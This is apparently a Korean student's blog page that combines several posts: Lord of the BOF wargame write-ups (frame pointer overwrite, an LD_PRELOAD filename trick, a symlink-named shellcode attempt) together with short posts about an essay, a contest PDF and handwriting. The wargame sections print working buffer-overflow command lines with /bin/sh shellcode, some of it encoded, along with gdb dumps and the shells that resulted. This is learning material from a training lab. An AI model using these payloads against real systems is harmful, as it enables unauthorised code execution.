EverTokki

어제 golem을 푸는데에 사용한 frame pointer overwrite에 대해 간단하게 아는만큼만 쓰려고 합니다.

#include <stdio.h>

#include <stdlib.h>

void problem_child(char *src)

{

char buffer[40];

strncpy(buffer, src, 41);

printf("%s\n", buffer);

}

main(int argc, char *argv[])

{

if(argc<2){

printf("argv error\n");

exit(0);

}

problem_child(argv[1]);

}

이 소스를 한번 뜯어봅시다.

void problem_child(char *src)

{

char buffer[40];

strncpy(buffer, src, 41);

printf("%s\n", buffer);

}

-> buffer는 40바이트밖에 없는 반면, strncpy에서는 src에서 buffer으로 41바이트를 복사합니다.

(low)[buffer] [sfp] [ret](high) 가 있다 함은,(함수의 인자가 어떤 형식으로 스택에 보내지는지는 모르겠습니다) 41바이트를 복사하기 때문에 buffer를 지나 sfp 한 바이트를 변조 할 수 있는 것이죠.

problem_child의 sfp에는 후에 메인 함수로 복귀하기 위해 main 함수의 sfp전의 주소가 저장되어 있게 됩니다. 후에 실행할 명령이 더이상 없기 때문이죠.

이 함수의 leave 명령을 하게 되면,

leave:

mov ebp, esp

pop ebp

이 명령들에 의해 esp를 ebp가 있는 곳(sfp가 있는 곳)으로 이동시키고, pop ebp를 하여 ebp를 복귀시키며 동시에 esp에도 4를 더하게 됩니다.(여기서 알고있어야 하는것은 sfp에 있던 값이 변조된 값이라 sfp를 참고한 ebp는 메인으로 복귀하지 않고 이상한 곳으로 날아갔다는 점입니다. 이걸 악이용해 해커는 ebp가 원하는 곳으로 가게끔 변조할 수 있습니다.)

leave 후 ret 명령이 실행되는데요(모두 problem_child안에서 일어나고 있습니다), 이것은 eip에 ret(ebp+4)에 저장되어있는 주소를 넣어 후에 실행할 코드의 주소를 알려주게 됩니다. 여기서, ebp는 현재 변조된 sfp에 의해 이상한 주소로 날아가 있기 때문에, 그 주소에서부터 4바이트를 읽어들여 eip에 넣게 됩니다. 결과적으로 이상한 곳에 있는 이상한 데이터를 eip에 넣게 되는 것입니다.

어제 풀 때 사용한 노트를 보면,

argv[1] = [one of the nopsled's addr] [nopsled] [shellcode] [the byte that overflows the fp]

has to equal 41bytes

라는 내용이 있습니다.

fp는 메인함수를 가르키고 있기 때문에 주소값의 앞 6자리는 같았습니다. 그 후, 우리가 사용할 수 있는 공간은 argv[1]이었기 때문에 fp를 변조해 ebp가 argv[1]-4의 주소를 가리키고 있게 하였습니다. argv[1]은 위에 구성한 것처럼 앞의 4바이트가 ret로 인해 읽혀야 하니 주소값을 넣어야 합니다. 고로, 앞의 4바이트는 뒤에 넣은 nopsled중 한 곳을 가리키게 하였습니다. ret가 실행된 후 nopsled를 타고 쉘코드가 실행되게 할 수 있기 위함이죠. strncpy에서 41바이트가 복사되어야 하니 마지막 바이트는 fp를 변조할 값을 넣었습니다. 이렇게 해서 leave에서 변조된 ebp가 &(argv[1])-4로 점프하고, pop esp로 esp는 problem_child 의 ret명령을 실행하고, ebp는 4바이트 늘어난 뒤 ret를 가리키는줄 알고 argv[1]의 첫 4바이트를 eip에 넣게 됩니다. 그러면 eip는 그 주소(이 경우 nopsled)로 점프하여 그 후 나오는 명령, (여기선 쉘코드)를 결과적으로 실행하게 됩니다.

fpo가 메인함수에서 안되는 이유는 모르겠지만, 제 생각으로는 타 함수들은 메인으로 돌아가기 위해 sfp를 주소 복구용으로 사용하는 반면, 메인 함수는 ~~돌아가야 할 주소가 필요 없기 때문에 메인함수에서는 실행이 안되는것 같습니다.~~ 메인 함수는 _libc_start_main으로 돌아가야하죠.. 없는 디버깅 실력을 모아 메인 함수를 따라가 봤는데, sfp가 있는 곳에는 0x00000000이 있드라구여. 그 후에 있는 ret 주소는 start함수를 가르키고 있었는데.. 워낙 디버깅 실력이 없어서 더는 못찾아봤어요.ㅋㅋ..

이거 쓰고보니 한국어 참 어렵네요.. 뭔가 설명이 오묘하다.

http://research.hackerschool.org/Datas/Research_Lecture/sfp.txt

꼭 참고하시기 바랍니다 :)

저작자표시

'STUDY > Documentation' 카테고리의 다른 글

strace, 제가 한번 사용해 보겠습니다. (0)	2014.07.22
Buffer Overflow (3)	2014.05.18
Key File (0)	2014.05.16
[CodeGate Junior Quals] RunCommand 250 (0)	2014.04.06
MISCCCCCCCCCC! (0)	2014.03.11

와나..

http://research.hackerschool.org/Datas/Research_Lecture/sfp.txt

이거 읽으세요. 바로 이해감.

와...

와ㅏ...

밤샌 보람이 있는데요?!

/*

The Lord of the BOF : The Fellowship of the BOF

- darkknight

- FPO

*/

#include <stdio.h>

#include <stdlib.h>

void problem_child(char *src)

{

char buffer[40];

strncpy(buffer, src, 41); /*strncpy(dest, source, #of bytes)- argv[1]에서 버퍼로 41바이트를 복사한다. 버퍼는 40바이트인데, 그래서 뒤에 있는 한 바이트가 이 함수에서 메인함수로 돌아갈 때 사용하는 스택프레임 포인터를 오버플로우하게 된다*/

printf("%s\n", buffer);

}

main(int argc, char *argv[])

{

if(argc<2){

printf("argv error\n");

exit(0);

}

problem_child(argv[1]);

}

[golem@localhost golem]$ ./porkknight `perl -e 'print "\x90\xfc\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x86"x2'`

ü ¿j

XRh//shh/binRSÍ̀ú ¿Mü ¿û ¿ @

Segmentation fault (core dumped)

[golem@localhost golem]$ gdb -q porkknight core

Core was generated by `./porkknight ü ¿j

XRh//shh/binRSÍ̀'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xfc764000 in ?? ()

(gdb) x/40wx $esp

0xbffffa8e: 0xfaecbfff 0xd920bfff 0x43e04005 0xfab44001

0xbffffa9e: 0x6070bfff 0x69804006 0x85004010 0xfac40804

0xbffffaae: 0x81ecbfff 0xfaec4010 0x8466bfff 0x85000804

0xbffffabe: 0xfac40804 0xfc90bfff 0x9090bfff 0x90909090 //여기보면 argv[1]

0xbfffface: 0x90909090 0x6a909090 0x5299580b 0x732f2f68

0xbffffade: 0x622f6868 0xe3896e69 0xe1895352 0xfa8680cd

0xbffffaee: 0x849ebfff 0xfc4d0804 0xfb18bfff 0x09cbbfff

0xbffffafe: 0x00024003 0xfb440000 0xfb50bfff 0x3868bfff

0xbffffb0e: 0x00024001 0x83900000 0x00000804 0x83b10000

0xbffffb1e: 0x846c0804 0x00020804 0xfb440000 0x82e4bfff

(gdb) q

[golem@localhost golem]$ ./porkknight `perl -e 'print "\xc4\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @

Illegal instruction (core dumped)

[golem@localhost golem]$ gdb -q a.out core

warning: core file may not match specified executable file.

Core was generated by `./porkknight úú ¿j

XRh//shh/binRSÍ̀À'.

Program terminated with signal 4, Illegal instruction.

#0 0xbffffac4 in ?? ()

(gdb) z

[1]+ Stopped gdb -q a.out core

[golem@localhost golem]$ gdb -q porkknight core

Core was generated by `./porkknight úú ¿j

XRh//shh/binRSÍ̀À'.

Program terminated with signal 4, Illegal instruction.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbffffac4 in ?? ()

(gdb) x/40wx $esp

0xbffffac8: 0x90909090 0x90909090 0x90909090 0x580b6a90

0xbffffad8: 0x2f685299 0x6868732f 0x6e69622f 0x5352e389

0xbffffae8: 0x80cde189 0xbffffac0 0x0804849e 0xbffffc4d

0xbffffaf8: 0xbffffb18 0x400309cb 0x00000002 0xbffffb44

0xbffffb08: 0xbffffb50 0x40013868 0x00000002 0x08048390

0xbffffb18: 0x00000000 0x080483b1 0x0804846c 0x00000002

0xbffffb28: 0xbffffb44 0x080482e4 0x080484dc 0x4000ae60

0xbffffb38: 0xbffffb3c 0x40013e90 0x00000002 0xbffffc40

0xbffffb48: 0xbffffc4d 0x00000000 0xbffffc78 0xbffffc88

0xbffffb58: 0xbffffca0 0xbffffcbf 0xbffffce1 0xbffffcec

(gdb) q

[golem@localhost golem]$ ./porkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @

bash$ gjf

sh: gjf: command not found

bash$ exit

exit

[golem@localhost golem]$ ./darkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @

bash$ my-pass

euid = 512

이번에 하면서 노트테이킹한거:

argv[1] = [one of the nopsled's addr] [nopsled] [shellcode] [the byte that overflows the fp]

has to equal 41bytes

23byte(쉘코드) 4byte(argv[1] 주소) = 27byte

13byte(nop)

아무것도 안넣어도 segfault가 나서 왜인지 trace를 해보니 strncpy에서 그냥 쭉 계속 해서 나머지 쓰레기값을 넣고있어서 그런거였다.. 멍청멍청 똥멍청 strncpy

strace ./porkknight `perl -e 'print "AAAA"'` -i

노트테이킹한 종잌ㅋㅋㅋ 낙서가 많아보이는건 착각이구여 엄마가 후에 뭐가 이렇게 더럽냐며 버리심ㅋㅋㅋㅋㅋ

LeaveRet에서 후광이 나는군여 보이나여

기분좋네옇

이제 에세이를 써야되는데 2장더써야댐 망함 2시임 프린트도해야댐 망함

이 문제 처음에 막 fpo문서를 봐도 이해가 안가서 풀이를 봤는데도 이해 안가서 그냥 fpo문서 엄청 열심히 읽으니까 막 스택도 그려지고 ebp도 따라갈 수 있게되고 esp가 뭔짓을 하는지도 좀 그려지고 우왕아ㅓㅁㄹㄴㅇㄹ밍ㄹ 스택 늘어나느것도 보이고 leaveret이 뭐를 하는지도 그려지고 와 진짜 이번껀 좀 대박이었어요 그래서 결국 마지막엔 풀이 기억도 안나고 걍 제 힘으로 풀게됬네여 아 완전기분좋다

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

bugbear->giant(1) (0)	2014.04.16
darkknight->bugbear (2)	2014.04.07
skeleton->golem (5)	2014.03.17
vampire->skeleton (2)	2014.02.25
troll->vampire (0)	2013.12.22

CodeGateJr_.pdf

음..

저를 본선으로 이끌어주었던.. 문제임다.

이끌어주긴 했는데..

ㅠ....

내년엔 기술적인 문제를 풀고싶네요ㅋㅋ

저작자표시

'STUDY > Documentation' 카테고리의 다른 글

strace, 제가 한번 사용해 보겠습니다. (0)	2014.07.22
Buffer Overflow (3)	2014.05.18
Key File (0)	2014.05.16
Frame Pointer Overwrite/One Byte Overflow (5)	2014.04.06
MISCCCCCCCCCC! (0)	2014.03.11

EvTki.TKAM.pdf

"How, and to what extent, is inequality presented in the book, To Kill a Mockingbird?"를 주제로 한 에세이입니다.

81%로 B-를 받았죠! 하핳핳하ㅏ하하핳하ㅏ하ㅏ하하

넴 그렇다고 합니다..

저작자표시

'ARCHIVE > 학교' 카테고리의 다른 글

[구글인턴] Google Dubai 일주일 체험기 (9)	2015.05.06
DAAMUN 1- United Kingdom (0)	2014.11.01
[과학]The effect of salt on ice lab report (0)	2013.12.02
JoMUN 11- Mali (0)	2013.10.08
[영어]The Necklace by Guy Demaupassant 정리 (0)	2013.09.12

..

..나는누구..?

...여긴어디....?

이번 문제(뿐만아니라 모든 문제들에)에 한줄기 빛을 떨궈준 cd80형에게 엄청난 감사를 표하는 바입니다.

그래도 LD_PRELOAD쓰는방법은 모름미다. 알거같은데 시도를 안해봤어여. 해봐야징.

[(http://cd80.tistory.com)☜☜ 엄청난 시스해커 블로그!클릭클릭]

로그:

//소스를 처음에 봤는데 memset쪽이 뭔소린지 이해안가서 소스에따가 열씨미 주석달았습니다.

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n"); //아규멘트가 2개 이하면 ㅂㅂ!! :D

exit(0);

}

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n"); //48번째는 \xbf

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// stack destroyer!

memset(buffer, 0, 44); //버퍼의 44바이트를 다 뽀삼-buffer+sfp

memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));

/*그리고 리턴어드레스에 들어간 후의 것들도 다 파개

memset(source, data, amount of data)인데 0xbfffffff - (int)(buffer+48)란 뜻은 buffer+48부터 bfffffff까지의 거리만큼을 다 파괘한단 소리다 절망적이네 */

}

[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f"'`

[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f"'`

[skeleton@localhost skeleton]$ gcc -shared -fPIC asdf.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

//여기서 쉘코드랑 놉썰매를 넣어여. 찾기 쉬워지거든여. 썰매도타공

[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

//LD_PRELOAD에 쉘코드뭉치를 넣어요.

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

XRh//shh/binRSÍ̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) q

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

XRh//shh/binRSÍ̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) x/100wx 0xbfff0000

0xbfff0000: Cannot access memory at address 0xbfff0000

(gdb) x/100wx 0xbffff000

0xbffff000: 0x000005c9 0x0000029f 0x000006a6 0x0000045f

0xbffff010: 0x000006dd 0x000004a6 0x00000000 0x00000620

0xbffff020: 0x0000051e 0x00000000 0x00000584 0x0000069c

[중략..]

0xbffff610: 0x6b732f65 0x74656c65 0x902f6e6f 0x90909090

0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff630: 0x90909090 0x90909090 0x90909090 0x90909090

(gdb)

0xbffff640: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff650: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff660: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff670: 0x90909090 0x90909090 0x90909090 0x6a909090

0xbffff680: 0x5299580b 0x732f2f68 0x622f6868 0xe3896e69

0xbffff690: 0xe1895352 0x732e80cd 0x4000006f 0x40013868

0xbffff6a0: 0x4000220c 0xbffffbd1 0x00000000 0x00000000

0xbffff6b0: 0x00000000 0x00000000 0x40014a00 0x00000000

0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000006

0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff700: 0x00000000 0x00000001 0x00000000 0x00000001

0xbffff710: 0xbffff608 0x00060000 0x00000000 0x00000000

(gdb) q

[skeleton@localhost skeleton]$ vi `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c

[skeleton@localhost skeleton]$ gcc -shared -fPIC `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

[skeleton@localhost skeleton]$ cat `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c

#include<stdio.h>

int main()

{

printf ("wat do i do");

return 31337;

} //소스 뻘글돋네여

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

XRh//shh/binRSÍ̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) x/100wx 0xbfff0000

0xbfff0000: Cannot access memory at address 0xbfff0000

(gdb)

0xbfff0004: Cannot access memory at address 0xbfff0004

(gdb) x/100wx 0xbfff5000

0xbfff5000: Cannot access memory at address 0xbfff5000

(gdb) x/100wx 0xbfff9000

0xbfff9000: Cannot access memory at address 0xbfff9000

(gdb) x/100wx 0xbfffb000

0xbfffb000: Cannot access memory at address 0xbfffb000

(gdb) x/100wx 0xbfffd000

0xbfffd000: Cannot access memory at address 0xbfffd000

(gdb) x/100wx 0xbffff000 //일케 하나하나 스택을 올라감미다

0xbffff000: 0x000005c9 0x0000029f 0x000006a6 0x0000045f

0xbffff010: 0x000006dd 0x000004a6 0x00000000 0x00000620

0xbffff020: 0x0000051e 0x00000000 0x00000584 0x0000069c

0xbffff030: 0x00000716 0x0000054d 0x00000527 0x000004ed

0xbffff040: 0x000003a1 0x00000458 0x00000466 0x0000063f

0xbffff050: 0x00000000 0x000001ca 0x00000000 0x0000027f

[중략..]

0xbffff600: 0x6b732f65 0x74656c65 0x902f6e6f 0x90909090

0xbffff610: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff630: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff640: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff650: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff660: 0x90909090 0x90909090 0x90909090 0x6a909090

0xbffff670: 0x5299580b 0x732f2f68 0x622f6868 0xe3896e69

0xbffff680: 0xe1895352 0x732e80cd 0x4000006f 0x40013868

0xbffff690: 0x4000220c 0xbffffbbc 0x00000000 0x00000000

0xbffff6a0: 0x00000000 0x00000000 0x40014a00 0x00000000

0xbffff6b0: 0x00000000 0x00000000 0x00000000 0x00000006

0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6f0: 0x00000000 0x00000001 0x00000000 0x00000001

0xbffff700: 0xbffff5f8 0x00060000 0x00000000 0x00000000

0xbffff710: 0x00000000 0x00000001 0x00000000 0x00000000

0xbffff720: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff730: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff740: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff750: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff760: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff770: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff780: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb) q

The program is running. Exit anyway? (y or n) y

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`

ö ¿

bash$ q

sh: q: command not found

bash$ exit

exit

[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`

ö ¿

bash$ my-pass

euid = 511

방식을 안 후에도 삽질을 많이 했는데, 처음엔 "막 뭐 소스의 함수를 후킹하라는건갘ㅋㅋㅋㅋ아닐텐뎈ㅋㅋ"이러며 웃고있다가 LD_PRELOAD는 환경변수잖아여. 그래서 쉐어드 라이브러리명만 쉘코드로 해놨더니 이게 동적링크인걸로 알고있는데 그래서 쉘코드 안떠서..는 뻥이고요 지금보니까 소중히 잘 들어있네 난 무슨뻘짓을 한거지.

암튼 LD_PRELOAD란 공유라이브러리를 프로그램 실행전에 들고와서 스택에 고이고이 저장해둡니다. 찾아보니 그냥 스택에 찌꺼기가 남는다던데 그 이유는 뭔가 좀 복잡하다고 합니다. 그래서 음 그냥 공유라이브러리 파일명을 쉘코드로 하면 됬네여. 그렇네. ㅠ. 풀이 방법을 글로 읽기만 하고 시도해본거라 제가 했다고 할 수는 없지만 다음번에 또 써보고 싶은 기법이에여. ~~간지나잖아~~ 처음에 코드보고 멘붕했는데 그것도 괜찮아진것 같고요 뭐 여러모로 멘붕이었지만 뿌듯하네요 횡설수설 잡담읽어주셔서 감사합니다. 배고프다. 모두들 안녕히주무세여 가정에 평화가 깃들기를

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

darkknight->bugbear (2)	2014.04.07
golem->darkknight (0)	2014.04.06
vampire->skeleton (2)	2014.02.25
troll->vampire (0)	2013.12.22
orge->troll (0)	2013.12.21

MISCCCCCCCCCC.pdf

장난으로 시작한걸 정말 쓸 줄은 몰랐슴다.

근데 이거 쓰기 시작한건 작년에 시작했는데 중간에 묵혀두다가 오늘 발견하고 후딱 끝내버렸다..

뭔가 조금 허술한 감이 없지않아 많지만, 문서를 쓰는거에 조금 익숙해져야겠다 하고 연습겸 쓴 것 같아요.

언리밋님.. 예제에 풀이를 썼는데... 양해해주세요 +_+..

쓰는건 재미있었습니다ㅋㅋ 컬러풀하니 예쁜가요?

구글드라이브에서 적어서 포맷이 어케되었는지 확인하기 두렵습니다..

저작자표시

'STUDY > Documentation' 카테고리의 다른 글

strace, 제가 한번 사용해 보겠습니다. (0)	2014.07.22
Buffer Overflow (3)	2014.05.18
Key File (0)	2014.05.16
Frame Pointer Overwrite/One Byte Overflow (5)	2014.04.06
[CodeGate Junior Quals] RunCommand 250 (0)	2014.04.06

저거 한번쓰려고 종이에다가 한가득 제 닉네임을 (오글거리는것을 참고서) 쓴 다음에 골랐어요..

예쁘죠 예쁘죠

초딩때부터 영어나 한글이나 글씨 예쁘게 못쓰는게 엄청 트라우마였는데 중학생이 되고 나니 점점 좋아지더라고요.

그러니 초등학생 여러분, 예쁘게 쓴다고 굳이 자음을 그렇게 크게 쓰지 않아도 되요ㅋㅋ 날려쓰지 않아도 되고

편한대로 쓰세요 :) ~~초등학교 공책보면 이게 외계어인지 한글인지 세종대왕님 죄송합니다 사랑합니다~~ 옛날부터 열심히 써도 안나아지던 손글씨가 그냥 나아지더라고요

막 초딩때는 샤프쓰면 버릇나빠진다고 못쓰게 했는데 그래도 3~4학년부턴 써도 되는거같구여

중학생정도 되면 손에 힘이 생겨서인지 아니면 뭐 더 많이 써서 그런지 손글씨 교정이 다 되요ㅋㅋㅋㅋㅋ

저도 쓰면서 신기함..

한 중2 중반부터 나아지더니 ~~그당시 여름에 다닌 영어학원때문인가 에세이를 많이 써서 그런가~~ 이제는 진짜 대충써도 읽을만큼은 되요. 졸때는 예외...

암튼 그렇다고 합니다

저작자표시

'KOREAN > 뻘글' 카테고리의 다른 글

이번달에 할 것 (2)	2014.06.09
pCTF2014 irc log (2)	2014.04.13
[3월목표] 잡다 (0)	2014.02.24
LeaveRet Wiki (0)	2014.02.13
[1,2월목표] dovelet (0)	2014.01.10

헠헠헠헠허커헣컿ㅋ헠ㅎ

내가 몇달동안 삽질하다가 아씨 나는 재능이업나보다 할 정도으 ㅣ문제였느데!!!!!!!!!!!!!!!!!

으헝ㄹㅁㄴㅇ럼ㄴ임ㄴㅇㄹ!!!!!!!!!!!!

풀렸쪙!!!!!!!!!!!!!!!

ㅇ름ㄴㄴㄹㄹㄹㄹㅁㄴㅇㄹ

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

argv error

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xcd\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q `perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfffffe0 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/?????????????????????????????????????????^12l?u楕凹2핽i00tii0jo??T??

귁?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x315e11eb 0x8032b1c9 0x80010f6c 0xf67501e9

0xbfffffdd: 0xeae805eb 0x32ffffff 0x306951c1 0x69697430

0xbfffffed: 0x8a6f6a30 0x8a5451e4

(gdb) x/10x 0xbfffffcc

0xbfffffcc: 0x5e11eb90 0x32b1c931 0x010f6c80 0x7501e980

0xbfffffdc: 0xe805ebf6 0xffffffea 0x6951c132 0x69743030

0xbfffffec: 0x6f6a3069 0x5451e48a

(gdb) q

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xcc\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

argv error

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

